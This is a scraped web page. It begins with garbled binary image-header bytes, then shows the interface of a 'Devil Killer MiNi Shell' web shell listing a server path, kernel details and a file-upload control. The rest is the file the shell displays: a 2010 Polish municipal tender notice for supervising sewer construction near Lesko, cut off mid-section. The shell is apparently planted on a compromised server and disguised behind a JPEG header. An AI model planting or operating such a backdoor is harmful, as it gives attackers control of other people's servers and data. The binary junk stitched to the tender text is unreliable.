JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100804/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100804/208893-N-2010.html

<p class="kh_header"><b>Lesko: Pełnienie obowiązków nadzoru inwestorskiego nad realizacją zadania pod nazwą: Budowa gminnej kanalizacji sanitarnej w miejscowościach: Weremień, Łączki w ramach programu Ochrona zlewni rzeki San.</b><br>
<b>Numer ogłoszenia: 208893 - 2010; data zamieszczenia: 04.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lesko , ul. Parkowa 1, 38-600 Lesko, woj. podkarpackie, tel. 013 4698001, 4698158, faks 0-13 4696458.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lesko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie obowiązków nadzoru inwestorskiego nad realizacją zadania pod nazwą: Budowa gminnej kanalizacji sanitarnej w miejscowościach: Weremień, Łączki w ramach programu Ochrona zlewni rzeki San..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje pełnienie obowiązków nadzoru inwestorskiego nad pracami budowlanymi dotyczącymi:
ETAP I - Budowa gminnej kanalizacji sanitarnej w miejscowości Weremień w ramach programu Ochrona zlewni rzeki San, włączonej do kanalizacji sanitarnej w miejscowości Huzele do studzienek ST1A oraz ST1. Zadanie obejmuje:
- budowę kanalizacji grawitacyjnej z rur: PCV-U SDR34 SN8 O200x5,9, O15x7,7 kl. S, przyłącza do budynków - PCV-U SDR34 PN8 O 160x4,7 kl. S,
- budowę kanalizacji ciśnieniowej z rur PE SDR17 PE80 PN8 o średnicy O63x3,8 oraz O90x5,8,
- budowę czterech przepompowni ścieków wraz ze zdalnym sterowaniem stanów awaryjnych- P1, P2, P3, P4. Przepompownie P1, P2, P3 to przepompownie przydomowe a P4 to przepompownia główna z ogrodzeniem,
- ośmiokrotne przekroczenie odwiertem drogi powiatowej Nr 2270 Huzele-Weremień,
- trzykrotne przejście rurociągiem pod dnem potoku Weremień oraz trzykrotne przez potok bez nazwy
Parametry kanalizacji:
Rury PCV kl. S SDR34 O200x5,9 na podsypce gr. 20 cm i obsypce gr. 30 cm nad wierzch rury - 3 155,0 m,
- Rury PCV kl. S SDR34 O160x4,7 na podsypce gr. 20 cm i obsypce gr. 30 cm nad wierzch rury - 728,1 m,
- Rury PE80 SDR17 PN8 O63x3,8 na podsypce gr. 20 cm i obsypce gr. 30 cm nad wierzch rury - 385,8 m,
- Rury PE80 SDR17 PN8 O90x5,8 na podsypce gr. 20 cm i obsypce gr. 30 cm nad wierzch rury - 411,8 m,
- Rury PE80 SDR17 PN8 O200x311,9 na podsypce gr. 20 cm i obsypce gr. 30 cm nad wierzch rury - 16,4 m,
- Rura trójwarstwowa PE100 O63x5,8 - 34,5 m,
- Rura trójwarstwowa PE100 O90x8,2 - 63,6 m,
- Studzienki O600 tworzywowe prefabrykowane z włazem A15 - 181 szt,
- Studzienki O600 tworzywowe prefabrykowane z włazem żeliwnym i pokrywą D400 w drogach - 24 szt,
- Studzienki O600 tworzywowe prefabrykowane w wykonaniu przeciwzalewowym z włazem A15 - 7 szt.,
- Studzienki O1000 - rozprężne tworzywowe prefabrykowane - 4 szt.,
- Przepompownie ścieków - 4 szt (P1, P2, P3, P4).

ETAP II - Budowa gminnej kanalizacji sanitarnej w miejscowości Łączki w ramach programu Ochrona zlewni rzeki San. Zadanie obejmuje:
- budowę kanalizacji grawitacyjnej z rur PCV-U SDR-34 SN8 O200x5,9; O315x7,7 kl. S, przyłącza do budynków - PCV-U SDR-34 SN8 O160x4,7 kl. S,
- budowę kanalizacji ciśnieniowej z rur PE80 SDR17 PE80 PN8 o średnicy O160x9,5
- budowę dwóch przepompowni ścieków wraz ze zdalnym sterowaniem stanów awaryjnych - P1, P2,
- dwukrotne przekroczenie metodą odwiertu  drogi wojewódzkiej Nr 893 Lesko-Cisna
Parametry kanalizacji:
- Rury PCV kl. S SDR34 O 315x7,7 na podsypce gr. 20 cm i obsypce gr. 30 cm nad rury - 3 280,3 m,
- Rury PCV kl. S SDR34 O 200x5,9 na podsypce gr. 20 cm i obsypce gr. 30 cm nad rury - 2 021,2 m,
- Rury PCV kl. S SDR34 O160x4,7 na podsypce gr. 20 cm i obsypce gr. 30 cm nad rury - 2 241,9 m,
- Rury PE80 SDR17 PN8 O160x9,5 na podsypce gr. 20 cm i obsypce gr. 30 cm nad rury - 33,8 m,
- Rury PE80 SDR17 PN8 O 2000x11,9 na podsypce gr. 20 cm i obsypce gr. 30 cm nad rury - 30,6 m,
- Studzienki O600 tworzywowe prefabrykowane z włazem A15 340 szt,
- Studzienki O600 tworzywowe prefabrykowane z włazem żeliwnym i pokrywą D400 w drogach 1 szt,
- Studzienki O600 tworzywowe prefabrykowane w wykonaniu przeciwzalewowym z włazem A15 - 97 szt,
- Studzienki O1000 - rozprężne tworzywo prefabrykowane - 2 szt, 
- Przepompownie ścieków - 2 szt.
W ramach niniejszego zamówienia Inspektor Nadzoru zobowiązuje się do:
- codziennej obecności na terenie realizacji inwestycji, potwierdzanej zapisem w dzienniku budowy,
- reprezentowania Zamawiającego - Inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z dokumentacją projektową, przepisami oraz zasadami wiedzy technicznej,
- podejmowania działań w celu dotrzymania terminu realizacji budowy,
- sprawdzania jakości wykonywanych robót, wbudowanych wyrobów budowlanych, a w szczególności zapobiegania zastosowania wyrobów budowlanych wadliwych i nie dopuszczonych do obrotu i stosowania w budownictwie, kontroli dokumentów potwierdzających dopuszczenie tych materiałów do obrotu,
- sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających,
- wydawania kierownikowi budowy lub kierownikom robót poleceń potwierdzonych wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych i urządzeń technicznych,
- żądania od kierownika budowy lub kierowników robót dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót,
- kontrolowania ilości i terminowości wykonywanych robót poprzez: uczestniczenie w dokonywaniu odbioru częściowego oraz końcowego dla każdego etapu inwestycji.
- sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót.
- kontroli wpisów w dzienniku budowy,
- dokonania odbioru inwestycji po upływie terminu gwarancji ustalonego w umowie z wykonawcą robót budowlanych,
- ochrona interesów Zamawiającego,
- sprawdzanie dokumentacji powykonawczej oraz wszystkich dokumentów dostarczonych przez Wykonawcę robót pod względem ich kompletności, treści merytorycznej,
- uczestnictwo w przekazaniu Wykonawcy robót budowlanych placu budowy,
- przeprowadzenie ewentualnych zmian w dokumentacji z uzyskaniem stosownych zezwoleń wraz z koordynacją działań z nadzorem autorskim i instytucją nadzorującą realizację projektu,
- w przypadku gdyby zaistniała taka konieczność wyjaśnienie w imieniu Zamawiającego wszelkich wątpliwości dotyczących projektu i zawartych w nim rozwiązań, 
- sprawdzanie poprawności ubezpieczeń i gwarancji z warunkami umowy na roboty budowlane,
- ustalanie zakresu ewentualnych robót zamiennych, opracowywanie protokołów konieczności wykonywania tych robót z odpowiednim uzasadnieniem, w celu uzyskania akceptacji ze strony Zamawiającego,
- udzielanie pomocy we wszystkich działaniach Zamawiającego związanych z realizacją i rozliczeniem wniosku o dofinansowanie zadania -Budowa gminnej kanalizacji sanitarnej w miejscowościach: Weremień, Łączki w ramach programu Ochrona zlewni rzeki San w ramach PROW tj. wnioski o płatność, sprawozdania,
- prowadzenie polubownych uzgodnień w przypadku zaistnienia konfliktu pomiędzy Zamawiającym a osobami uczestniczącymi w realizacji zadania w tym szczególności osobami, podmiotami, na których terenie będzie realizowany projekt oraz osobami i podmiotami, które będą przyłączane do kanalizacji sanitarnej,
-organizowanie, prowadzenie oraz sporządzanie protokołów z regularnych spotkań z wykonawcami, podwykonawcami innymi uczestnikami realizacji inwestycji w celu omówienia i ustalenia procedur organizacyjnych, omówienia postępu robót i ich jakości, zaangażowanego potencjału siły roboczej i problematyki BHP, zgodności wykonania robót z przepisami prawa, orzeczeń i uzgodnień właściwych organów oraz przepisami normatywnymi, wpływu czynników zewnętrznych na realizację inwestycji,
- przygotowanie materiałów koniecznych do odbioru końcowego każdego etapu i odbiorów częściowych: potwierdzenie w dzienniku budowy gotowości obiektu do odbioru końcowego każdego etapu i częściowego, skompletowanie dokumentacji powykonawczej, skompletowanie dokumentów zamontowanego wyposażenia i urządzeń (karty gwarancyjne, instrukcje itp.), koordynowanie odbiorów specjalistycznych: Państwowej Inspekcji sanitarnej, Państwowej Inspekcji Pracy, Państwowej Straży Pożarnej i innych wymaganych przepisami lub przez dostawców mediów, wystąpienie do Zamawiającego z wnioskiem o powołanie komisji odbioru końcowego dla każdego etapu , następnie powiadomienie o odbiorze wszystkich uczestników procesu inwestycyjnego i przeprowadzenie procesu odbioru końcowego każdego etapu wraz ze sporządzeniem protokołu,
-Zorganizowanie i przeprowadzenie odbioru dla każdego etapu zadania (inspekcji) i sporządzanie protokołu odbioru końcowego, Świadectwa przejęcia, listy wad i usterek z terminem ich usunięcia oraz innych dokumentów związanych z warunkami umowy.,
- pomoc Zamawiającemu w realizacji uprawnień z tytułu rękojmi i gwarancji,
- rozliczenie końcowe dla każdego etapu w ciągu 30 dni od daty odbioru końcowego etapu wraz z przygotowaniem druków PT i OT,
- w okresie gwarancyjnym (okres zgłaszania wad), przeprowadzenie przeglądów pogwarancyjnych, nadzorowanie i egzekwowanie usuwania wad przez Wykonawcę Robót, koordynacja zwolnień zatrzymanych kwot, wydanie świadectwa wykonania, przygotowanie i wydanie Końcowego Świadectwa Płatności,
- przygotowanie niezbędnych dokumentacji do finansowego i merytorycznego rozliczenia dofinansowania udzielonego z Europejskiego Funduszu Rozwoju Regionalnego w ramach PROW 2007-2013 w ramach wniosku Budowa gminnej kanalizacji sanitarnej w miejscowościach: Weremień, Łączki w ramach programu Ochrona zlewni rzeki San,
- inne czynności i zadania nie wymienione powyżej, które okażą się konieczne dla prawidłowej realizacji umowy na roboty budowlane.
Zakres podstawowych obowiązków i praw inspektora nadzoru inwestorskiego określa art. 25 i art. 26 ustawy z dnia 7 lipca 1994 r.- Prawo budowlane (Dz .U. z 2006r. Nr 156, poz. 1118 ze zm.)
Szczegółowy zakres rzeczowy przedstawiony jest w dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych, kosztorysie ofertowym dla zadania pn. Budowa gminnej kanalizacji sanitarnej w miejscowościach: Weremień, Łączki w ramach programu Ochrona zlewni rzeki San, które są do wglądu w Urzędzie Miasta i Gminy Lesko ul. Parkowa 1, 38-600 Lesko pokój nr 201 (II piętro) w godz. od 7.30 do 15.30 oraz na stronie internetowej www.bip.lesko.pl (zakładka przetargi).
Zaleca się, aby Wykonawca na własną odpowiedzialność i ryzyko obejrzał miejsce robót oraz zgromadził wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty i podpisania umowy.
Wykonawca ponosi :
1)	całkowitą odpowiedzialność cywilną za straty i szkody powstałe w związku z wykonywanymi przez Wykonawcę czynnościami lub przy okazji ich wykonywania a będące następstwem działania Wykonawcy, rażącego niedbalstwa lub braku należytej staranności przy realizacji umowy, 
2)	odpowiedzialność wobec Zamawiającego za niewykonanie lub nienależyte wykonanie usługi nadzoru inwestorskiego w szczególności za błędy i naruszenia zasad praktyki zawodowej,
3)	pełną odpowiedzialność za skutki prawne i finansowe spowodowane istotnymi zmianami wprowadzonymi przez siebie w trakcie realizacji inwestycji, które nie zostały wcześniej zaakceptowane przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca przedłoży wykaz pełnionych nadzorów inwestorskich, zrealizowanych w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykaz pełnienia usług nadzoru inwestorskiego dla co najmniej jednego zadaniu o łącznej wartości robót nie mniej niż 2 500 000,00- zł. brutto, odpowiadających swoim rodzajem i wartością usług stanowiących przedmiot zamówienia z podaniem ich wartości oraz daty i miejsca wykonania, oraz załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie.
Zamawiający uzna warunek za spełniony jeżeli wykonawca nadzorował roboty budowlane przy budowie kanalizacji. W przypadku oferty wspólnej wykonawców warunek doświadczenia musi spełniać przynajmniej jeden z wykonawców. 
W celu wykazania spełnienia warunków udziału w postępowaniu Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonywania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Jeżeli wykonawca realizuje uprawnienia opisane powyżej a podmioty z których zasobów korzysta wykonawca będą brały udział w realizacji części zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia warunków  przez wykonawców nastąpi na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca wykaże, iż dysponuje co najmniej:
a) jedną osobą posiadającą uprawnienia wymagane ustawą Prawo budowlane wraz z kopiami dokumentów, potwierdzających posiadane kwalifikacje i kopią aktualnych dokumentów potwierdzających przynależność do izby samorządu zawodowego do właściwej Okręgowej Izby Inżynierów Budownictwa w branży drogowej, 
b) jedną osobą posiadającą uprawnienia wymagane ustawą Prawo budowlane wraz z kopiami dokumentów, potwierdzających posiadane kwalifikacje i kopią aktualnych dokumentów potwierdzających przynależność do izby samorządu zawodowego do właściwej Okręgowej Izby Inżynierów Budownictwa w branży sanitarnej,
c) jedną osobą posiadającą uprawnienia wymagane ustawą Prawo budowlane wraz z kopiami dokumentów, potwierdzających posiadane kwalifikacje i kopią aktualnych dokumentów potwierdzających przynależność do izby samorządu zawodowego do właściwej Okręgowej Izby Inżynierów Budownictwa w branży elektrycznej.
W przypadku oferty wspólnej wykonawców warunek można spełnić łącznie.
Zamawiający dopuszcza również możliwość uznania uprawnień wynikających z innych niż krajowe przepisów np. treść dyrektyw, zawartych umów międzynarodowych i innych przepisów, które potwierdzają spełnienie warunków dotyczących dysponowania osobami zdolnymi do wykonania zamówienia.
W celu wykazania spełnienia warunków Wykonawca zobowiązany jest: 
a) złożyć wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności,
b) złożyć oświadczenie stwierdzające, iż osoby wymienione w wykazie posiadają wymagane przez Zamawiającego uprawnienia, 
c) podać informacje o podstawie dysponowania osobami ujętymi w wykazie.
W celu wykazania spełnienia warunków udziału w postępowaniu Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonywania zamówienia, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 
Jeżeli wykonawca realizuje uprawnienia opisane powyżej a podmioty z których zasobów korzysta wykonawca będą brały udział w realizacji części zamówienia, Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów oświadczenia o braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych
Ocena spełnienia warunków  przez wykonawców nastąpi na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach: 
